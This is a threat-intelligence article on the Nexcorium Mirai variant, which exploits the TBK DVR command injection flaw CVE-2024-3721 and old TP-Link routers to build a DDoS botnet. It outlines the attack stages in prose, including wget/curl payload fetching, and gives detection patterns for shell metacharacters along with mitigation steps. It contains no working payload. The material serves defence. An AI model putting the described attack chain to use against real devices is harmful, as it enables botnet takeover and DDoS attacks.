Nexcorium Mirai Variant Exploits CVE-2024-3721 in TBK DVR Botnet

Overview of the Nexcorium Botnet Campaign

A new Mirai variant identified as Nexcorium is actively targeting Internet of Things (IoT) devices to facilitate large-scale DDoS attacks. According to research from The Hacker News, which cites findings from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42, the campaign focuses on exploiting a command injection vulnerability in TBK DVR systems.

The emergence of Nexcorium demonstrates the persistent utility of Mirai source code in the threat intel landscape. By leveraging known vulnerabilities in unpatched or end-of-life (EoL) hardware, attackers can rapidly scale their infrastructure. This specific campaign highlights the risks associated with legacy hardware that remains connected to the public internet without adequate defensive measures or vendor support.

Technical Analysis: TBK DVR Command Injection Vulnerability

The primary vector for this campaign involves CVE-2024-3721, a medium-severity command injection vulnerability affecting TBK DVR devices. This CVE allows a remote, unauthenticated attacker to execute arbitrary system commands by sending specially crafted HTTP requests to the device.

Once the attacker gains a foothold via the command injection, the Nexcorium binary is downloaded and executed. This binary is a variant of the Mirai malware, which has been modified to include updated C2 communication protocols and a broader array of DDoS attack vectors. Beyond TBK DVRs, the threat actors are also targeting various EoL TP-Link Wi-Fi routers. These devices often contain unpatched RCE flaws that are trivial to exploit using automated scanning tools. Because these routers are no longer supported by the manufacturer, they represent a permanent Zero-Day risk for as long as they remain in service.

Characterizing Nexcorium TTPs

The TTP used by the Nexcorium operators follow the standard MITRE ATT&CK framework for botnet propagation. The process typically involves:

1. Scanning: Automated scanning of public IP ranges for the specific web interfaces of TBK DVRs and TP-Link routers.
2. Exploitation: Delivery of the command injection payload to achieve initial access.
3. Payload Delivery: Using shell commands (such as wget or curl) to download the architecture-specific Nexcorium binary from a remote staging server.
4. Persistence and Communication: Establishing a connection to the C2 server to receive instructions for launching attacks or scanning for new victims.

Detection and Remediation Strategies

Defenders must prioritize the identification of legacy IoT hardware within their environments. Identifying these devices is the first step in neutralizing the threat posed by Nexcorium. To maintain visibility, security teams should implement logging and monitoring for any unusual outbound traffic originating from DVRs or networking equipment.

How to Detect CVE-2024-3721 Exploit

To effectively monitor for this threat, organizations should look for specific IoC patterns in web server logs. Monitoring for HTTP POST or GET requests containing shell metacharacters (e.g., ;, |, &) directed at administrative endpoints of TBK DVRs is a primary detection method. Additionally, SIEM rules should be configured to alert on unauthorized outbound connections from IoT devices to unknown IP addresses on non-standard ports, which may indicate C2 beaconing.

Mirai Botnet Nexcorium Variant Mitigation

The most effective mitigation strategy involves the immediate decommissioning of EoL TP-Link routers. Since these devices do not receive security updates, they cannot be adequately secured against modern exploits. For TBK DVR systems, administrators should apply the latest firmware updates immediately. If a patch is unavailable, the devices must be placed behind a VPN or a Zero Trust access gateway to prevent direct exposure to the internet. Segregating IoT devices into dedicated VLANs can also prevent Lateral Movement should a device be compromised. Finally, ensuring that default credentials are changed to complex, unique passwords remains a fundamental step in preventing automated botnet takeovers.